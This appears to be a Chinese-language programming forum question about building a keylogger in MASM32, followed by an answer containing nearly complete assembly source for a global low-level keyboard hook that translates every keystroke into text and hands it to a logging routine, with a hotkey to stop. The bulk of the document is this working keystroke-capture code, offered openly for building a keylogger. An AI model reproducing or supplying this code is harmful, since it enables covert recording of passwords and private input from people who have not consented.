我正在尝试在 64 位处理器上用 MASM32 编写键盘记录器,使用的是 MASM32 SDK 和 Microsoft Visual Studio。
但是在完成链接等步骤之后,我遇到了一个看不懂的异常。
dll 文件也正确加载,并且 HookProc 也被正确调用
所以问题是
我在 64 位处理器上使用 32 位的 SetWindowsHookEx 是否会出现问题?
这是一个调用 SetWindowsHookExA 的 MASM32 示例。
; Installs KeyBoardProc as a WH_KEYBOARD_LL hook, then pumps messages until
; the registered hotkey arrives, and finally removes the hook.
;
; The last argument (dwThreadId) is 0, so the hook is not tied to a single
; thread. The third argument (hMod) is whatever is in eax at this point; the
; code that loads eax is not part of this listing.
; NOTE(review): this SetWindowsHookExA(WH_KEYBOARD_LL, ...) registration is the
; externally visible step of the sample and is the call that host-based
; monitoring would typically key on - confirm against your own telemetry.
invoke SetWindowsHookExA, WH_KEYBOARD_LL, addr KeyBoardProc, eax, 0
; Keep the returned hook handle: KeyBoardProc passes it to CallNextHookEx and
; the cleanup call below passes it to UnhookWindowsHookEx.
mov [hHook], eax
; --- Register Hot Key <Ctrl><Alt><F9> ---
; hWnd is NULL, so the WM_HOTKEY message is posted to this thread's queue.
; 0aaabbbbh is the hotkey id chosen by the sample.
invoke RegisterHotKey, NULL, 0aaabbbbh, MOD_CONTROL or MOD_ALT, VK_F9
; --- Message loop ---
; A low-level keyboard hook is called on the thread that installed it, so the
; thread has to keep retrieving messages for as long as the hook is in place.
.WHILE TRUE
invoke GetMessage, addr msg,NULL,0,0
; Leave the loop when GetMessage returns 0.
.BREAK .IF (!eax)
; The hotkey is the stop signal: show a message box, then leave the loop.
.IF msg.message==WM_HOTKEY
invoke MessageBox, NULL, addr MsgBoxTextA,addr MsgBoxCaption, MB_SYSTEMMODAL
.BREAK
.ENDIF
.ENDW
; --- Cleanup: remove the hook installed above ---
invoke UnhookWindowsHookEx,hHook
然后你需要一个KeyBoardProc,例如:
; lParam - A pointer to a KBDLLHOOKSTRUCT structure.
;
; typedef struct tagKBDLLHOOKSTRUCT {
; DWORD vkCode;
; DWORD scanCode;
; DWORD flags;
; DWORD time;
; ULONG_PTR dwExtraInfo;
; } KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT;
;-----------------------------------------------------------------------
; KeyBoardProc - WH_KEYBOARD_LL hook callback (32-bit MASM PROC).
;
; In:    nCode  = hook code
;        wParam = keyboard message identifier (WM_KEYUP / WM_SYSKEYUP are
;                 skipped below)
;        lParam = pointer to a KBDLLHOOKSTRUCT; the fields are read in
;                 order with lodsd (vkCode, scanCode, flags)
; Out:   eax    = whatever the final CallNextHookEx call returns
; Writes: eax, ecx, edx, esi, edi, ebx, and the byte variable deadkey
;
; For each event that is not skipped, the routine turns the key into text
; (either the ToAscii translation or the bracketed GetKeyNameTextA name) and
; passes that buffer to WriteToMem. Every path ends in CallNextHookEx.
; deadkey, hHook, MAXSIZE and WriteToMem are defined outside this listing.
;-----------------------------------------------------------------------
KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD
; Buffer handed to GetKeyboardState. MAXSIZE is not defined in this listing;
; GetKeyboardState fills a 256-byte array - TODO confirm MAXSIZE >= 256.
LOCAL lpKeyState[MAXSIZE] :BYTE
; 32-byte text buffer that receives the translated character or key name.
LOCAL lpCharBuf[32] :BYTE
; Skip events the routine does not process: the two nCode cases below and
; key-release messages. They go straight to CallNextHookEx.
.IF (nCode < 0 || nCode == HC_NOREMOVE)
jmp next_hook
.ELSEIF (wParam == WM_KEYUP || wParam == WM_SYSKEYUP)
jmp next_hook
.ENDIF
; --- Is it a dead key? ---
; eax = first DWORD of the structure (vkCode); map type 2 asks MapVirtualKey
; for the character value of that virtual key.
mov esi, [lParam]
lodsd
invoke MapVirtualKey, eax, 2
and eax,2147483648 ; top bit set (dead key)
cmp eax,2147483648
jne not_dead_key
; Remember that a dead key was seen and produce no output for this event.
mov byte ptr[deadkey],1
jmp next_hook
not_dead_key:
; Reload vkCode and dispatch on its low byte.
mov esi, [lParam]
lodsd
; Shift and Caps Lock presses produce no output of their own.
cmp al, VK_LSHIFT
je next_hook
cmp al, VK_RSHIFT
je next_hook
cmp al, VK_CAPITAL
je next_hook
; Escape, Backspace and Tab are reported by name instead of through ToAscii.
cmp al, VK_ESCAPE
je get_name_of_key
cmp al, VK_BACK
je get_name_of_key
cmp al, VK_TAB
je get_name_of_key
; Build the key-state array that ToAscii takes as its third argument.
lea ebx, [lpKeyState]
invoke GetKeyboardState,ebx
invoke GetKeyState, VK_LSHIFT
xchg esi, eax ; save result in esi
invoke GetKeyState, VK_RSHIFT
or eax, esi ; eax = left-shift state OR right-shift state
; Offset 16 (10h) is the VK_SHIFT slot of the key-state array.
mov byte ptr [ebx + 16], al ; overwrite the shift entry with the combined state
invoke GetKeyState, VK_CAPITAL
; Offset 20 (14h) is the VK_CAPITAL slot of the key-state array.
mov byte ptr [ebx + 20], al ; overwrite the caps lock entry
; --- Skip over ToAscii to prevent diacritic destruction! ---
; If the previous event was flagged as a dead key, report this key by name.
cmp byte ptr[deadkey],1
je get_name_of_key
to_ascii:
; edx = vkCode, eax = scanCode, ebx = key-state array, edi = output buffer.
mov esi, [lParam]
lea edi, [lpCharBuf]
lodsd
xchg eax, edx
lodsd
invoke ToAscii,edx,eax,ebx,edi,00h
; A non-zero return goes straight to output; zero falls through to the
; key-name path below.
test eax, eax
jnz write_to_mem
get_name_of_key:
; Clear the dead-key flag, then build the lParam-style value that
; GetKeyNameTextA takes: scanCode shifted left by 16, OR flags shifted left by 24.
mov byte ptr[deadkey],0
mov esi, [lParam]
lodsd ; skip virtual key code
lodsd ; eax = scancode
shl eax, 16
xchg eax, ecx
lodsd ; extended key info
shl eax, 24
or ecx, eax
; Format the name as "[name]": '[' goes in the first byte of lpCharBuf and the
; name is written starting at the second byte.
lea edi, [lpCharBuf]
mov byte ptr [edi],'['
inc edi
; edi = lpCharBuf + 1 here; the size argument passed is 32.
invoke GetKeyNameTextA,ecx,edi,32
invoke lstrlen,edi
; Store ']' at the position lstrlen reported as the end of the name.
mov byte ptr [edi+eax],']'
write_to_mem:
; Both translation paths meet here with the text in lpCharBuf.
lea edi, [lpCharBuf]
cmp byte ptr [edi],0dh ; carriage return?
jne wtm
mov byte ptr [edi+1],0ah ; add linefeed, so logs are easier to read.
wtm:
; WriteToMem is not shown in this listing; it receives 1 and the buffer
; address. NOTE(review): presumably it appends the text to a log - confirm.
invoke WriteToMem,1,edi
next_hook:
; Always pass the event on to the next hook; its result is left in eax for
; the ret below.
invoke CallNextHookEx, hHook, nCode, wParam, lParam
ret
KeyBoardProc ENDP